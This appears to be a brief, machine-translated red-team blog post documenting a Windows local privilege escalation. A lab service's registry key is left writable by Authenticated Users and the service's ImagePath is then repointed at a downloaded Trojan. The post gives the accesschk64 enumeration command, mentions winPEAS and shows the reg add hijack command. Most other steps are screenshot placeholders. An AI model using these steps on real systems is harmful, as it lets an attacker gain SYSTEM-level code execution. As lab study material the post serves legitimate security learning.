Weak Service Registry Permission Windows Privilege Promotion

Redteam Windows Privilege Promotion LPE
Learning record
Publish Date:   2021-11-07
Update Date:   2021-11-07
Word Count:   135
Read Times:   1 Min
Read Count:  

Some of the words

By hijacking the registry keys used by the service, an attacker can implement an application that executes maliciously

Actual use

Configure the environment

Create the following service

image-20211107203815803

Assign PTO rights to users

image-20211107203844878

To modify registry permissions, proceed as follows
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\5attack

image-20211107204022798

Grant full control over authenticating users

image-20211107204105018

accesschk64

Current permissions are as follows

image-20211107204424723

Verify that ALL access is assigned to the authenticated user

accesschk64.exe /accepteula "authenticated users" -kvuqsw hklm\System\CurrentControlSet\services

image-20211107204544717

Gets the target executable path

image-20211107204637302

powershell

image-20211107204734722

winPEASx64.exe

image-20211107205258264

Using the details

Download the Trojan remotely and modify the service's executable directly through the registry

reg add "HKLM\system\currentcontrolset\services\5attack" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\y\13339.exe" /f

image-20211107205722778

The permissions are as follows

image-20211107205715596

Author: Yangsir
Link: https://yangsirrr.github.io/2021/11/07/weak-service-registry-permission-windows-privilege-promotion/
Reprint policy: All articles in this blog are used except for special statements CC BY 4.0 reprint policy. If reproduced, please indicate source Yangsir !
Redteam Windows Privilege Promotion LPE
  TOC